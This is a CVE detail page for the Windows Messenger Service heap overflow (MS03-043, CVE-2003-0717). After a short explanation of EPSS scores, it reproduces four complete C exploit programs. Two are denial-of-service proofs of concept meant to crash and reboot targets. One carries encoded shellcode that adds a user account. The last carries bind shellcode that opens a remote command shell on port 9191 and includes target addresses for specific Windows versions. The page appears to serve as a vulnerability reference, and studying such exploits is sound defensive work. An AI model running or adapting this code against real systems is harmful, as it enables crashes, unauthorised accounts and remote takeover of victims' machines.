CVE-2003-0717 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* Mon Oct 20 14:26:55 NZDT 2003 Re-written By VeNoMouS to be ported to linux, and tidy it up a little. This was only like a 5 minute port but it works and has been tested. venomgen-x.co.nz <mailto:venomgen-x.co.nz> greets to str0ke and defy DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // 74 : fields length "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" // 0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // 8 : field length int usage(char *name) { printf("Proof of Concept for Windows Messenger Service Overflow..\n"); printf("- Originally By Hanabishi Recca - reccamail.ru\n\n <mailto:reccamail.ru\n\n> "); printf("- Ported to linux by VeNoMouS..\n"); printf("- venomgen-x.co.nz\n\n\n <mailto:venomgen-x.co.nz\n\n\n> "); printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name); printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n"); printf("-s <src netbios name>\n"); return 1; } int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; char from[57],machine[57],c; char body[4096] = "*** MESSAGE ***"; if(argc <= 2) { usage(argv[0]); exit(0); } while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) switch(c) { case 'd': strncpy(machine,optarg,sizeof(machine)); printf("Machine is %s\n",machine); break; case 'i': memset(&addr, 0,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(optarg); addr.sin_port = htons(135); break; case 's': strncpy(from,optarg,sizeof(from)); break; case 'h': usage(argv[0]); exit(0); break; } // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); } if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); } if(!strlen(from)) strcpy(from,"tolazytotype"); memset(packet,0, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size); if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) { perror("Error socket() - "); exit(0); } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("Error sendto() - "); exit(0); } exit(0); } // milw0rm.com [2004-08-08]

/* DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ? "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // @74 : fields length "\x00\x00"; // Exploit downloaded on www.k-otik.com unsigned char field_header[] = "\xff\xff\xff\xff" // @0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // @8 : field length int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr("192.168.186.3"); addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); /* for (i = 0; i < packet_size; i++) { if (i && ((i & 1) == 0)) fprintf(stdout, " "); if (i && ((i & 15) == 0)) fprintf(stdout, "\n"); fprintf(stdout, "%02x", packet[i]); } fprintf(stdout, "\n"); */ if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) exit(EXIT_FAILURE); /* if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1) exit(EXIT_FAILURE); */ exit(EXIT_SUCCESS); } // milw0rm.com [2003-10-18]

/*******************************************************************/ /* [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt] */ /* --------------------------------------------------------------- */ /* */ /* This Sploit use the unhandledexceptionfilter to redirect */ /* the execution. When overflow occur we have : */ /* */ /* mov eax,esi+8 */ /* mov ecx,esi+Ch */ /* mov dword ptr ds:[ecx],eax */ /* */ /* so we control ecx and edx and we can write 4 bytes */ /* where we want. */ /* If we try to write in a not writable memory zone, an */ /* excepetion is lauched and unhandledexceptionfilter too. */ /* */ /* A part of unhandledexceptionfilter : */ /* */ /* mov eax, dword_0_77ECF44C(=where) */ /* cmp eax, ebx */ /* jz short loc_0_77EA734C */ /* push esi */ /* call eax */ /* */ /* So we write the "WHAT"(=jmp esi+4Ch) at */ /* the "WHERE"(=77EA734C here) and when the exception occur */ /* the unhandledexceptionfilter is lauched so when call eax */ /* occur, it execute our code. */ /* */ /* Thx Kotik who coded the proof of concept,and Metasploit */ /* for Shellcode and last but not least kralor,Scurt from Crpt */ /* */ /* Tested on win2k FR SP0 */ /* */ /* */ /*******************************************************************/ #ifdef _WIN32 #include <winsock.h> #include <windows.h> #pragma comment (lib,"ws2_32") #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" "\x00\x00\x00\x00" "\xff\xff\xff\xff"; unsigned char ShellCode[] = // XorDecode 23 bytes "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" // AddUser:X Pass:X "\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55" "\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe" "\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe" "\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f" "\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5" "\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7" "\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96" "\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff" "\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f" "\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7" "\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf" "\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82" "\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a" "\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e" "\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97" "\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae" "\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77" "\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92" "\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96"; int main(int argc,char *argv[]) { int i, packet_size, fields_size, s,sp; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; #ifdef _WIN32 WSADATA wsaData; #endif if(argc<2) { printf("\t [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n"); printf("\t\t www.coromputer.net && Undernet #coromputer\n"); printf("---------------------------------------------------------------\n"); printf("Tested on Windows 2000 French Sp0\n\n"); printf("Downloaded from www.K-OTik.com\n"); printf("Syntax : %s <ip>\n",argv[0]); return -1; } #ifdef _WIN32 if(WSAStartup(0x101,&wsaData)) { printf("error: unable to load winsock.\n"); return -1; } #endif memset(&addr,0x00,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); addr.sin_port = htons(135); memset(packet,0x00,sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 printf("Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[2263]=(char)0x90; body[2264]=(char)0x90; body[2265]=(char)0x90; body[2266]=(char)0x90; body[2267]=(char)0x90; body[2268]=(char)0x90; //jmp 8 bytes plus loing body[2269]=(char)0xeb; body[2270]=(char)0x08; //WHAT CRYPTSVC.dll Win2k sp0 FRENCH body[2271]=(char)0x48; body[2272]=(char)0x65; body[2273]=(char)0x87; body[2274]=(char)0x76; //WHERE win2k sp0 FRENCH body[2275]=(char)0x4C; body[2276]=(char)0xF4; body[2277]=(char)0xEC; body[2278]=(char)0x77; for(i=2279;i<2606;i++) body[i]=ShellCode[i-2279]; body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("error: unable to create socket\n"); return -1; } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { printf("error: unable to send packet\n"); return -1; } return 0; } // milw0rm.com [2003-12-16]

// source: https://www.securityfocus.com/bid/8826/info Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise. /************************************************************************************ Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043) based on PoC DoS by [email protected] by Adik < netmaniac [at] hotmail.kg > http://netninja.to.kg Binds command shell on port 9191 Tested on Windows XP Professional SP1 English version Windows 2000 Professional SP3 English version access violation -> unhandledexceptionfilter -> -> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode attach debugger and c how it flows :) worked fine for me -[25/Oct/2003]- ************************************************************************************/ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> #pragma comment(lib,"ws2_32") #define VER "0.7" /**************** bind shellcode spawns shell on port 9191 ************************/ unsigned char kyrgyz_bind_code[] = { 0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,0xC9,0x66,0xB9, 0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH); int main(int argc,char *argv[]) { int sockUDP,ver,c, packetsz,cnt; unsigned char packet[8192]; struct sockaddr_in targetUDP; WSADATA wsaData; struct { char os[30]; DWORD SEH; DWORD JMP; } targetOS[] = { { "Windows 2000 SP 3 (en)", 0x77ee044c, // unhandledexceptionfilter pointer 0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e }, { "Windows XP SP 1 (en)", 0x77ed73b4, 0x7804bf52 //rpcrt4.dll call [edi+6c] }/*, { //not tested "Windows XP SP 0 (en)", 0x77ed63b4, 0x7802ff3d //rpcrt4 call [edi+6c] }*/ }; printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER); if(argc < 3) { printf(" Target OS version:\n\n"); for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++) printf(" [%d]\t%s\n",c,targetOS[c].os); printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n" " eg: msgr.exe 192.168.63.130 0\n",argv[0]); return 1; } ver = atoi(argv[2]); printf("[*] Target: \t IP: %s\t OS: %s\n" "[*] UEF: \t 0x%x\n" "[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP); WSAStartup(0x0202, &wsaData); printf("[*] WSAStartup initialized...\n"); ZeroMemory(&targetUDP, sizeof(targetUDP)); targetUDP.sin_family = AF_INET; targetUDP.sin_addr.s_addr = inet_addr(argv[1]); targetUDP.sin_port = htons(135); packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH); if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("[x] Socket not initialized! Exiting...\n"); return 1; } printf("[*] Socket initialized...\n"); printf("[*] Injecting packet into a remote process...\n"); if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); return 1; } else printf("[*] Packet injected...\n"); printf("[i] Try connecting to %s:9191\n\n",argv[1]); return 0; } /************************************************************************************/ int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH) { static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32" "\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff\x00\x00\x00\x00" "\xff\xff\xff\xff"; int packet_size,i,fields_size; char from[] = "NETMANIAC"; char machine[] = "ADIK"; char longjmp[] ="\x90\x90\x90\x90\x90" "\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF" "\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF" "\xFF\x2B\xC1\xFF\xE0"; char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90"; char body[5000] = "*** MESSAGE ***";//4096 ZeroMemory(packet, sizeofpacket); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; memset(body, 0x90, 2296); memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); memset(&body[2296],0x14,1800); memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp)); *(DWORD *)&body[2296+1121] = Jmp; *(DWORD *)&body[2296+1125] = SEH; memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1); fprintf(stdout, "[*] Msg body size: %d\n", 3656 - packet_size + sizeof(packet_header) - sizeof(field_header)); body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; return packet_size; } /************************************************************************************/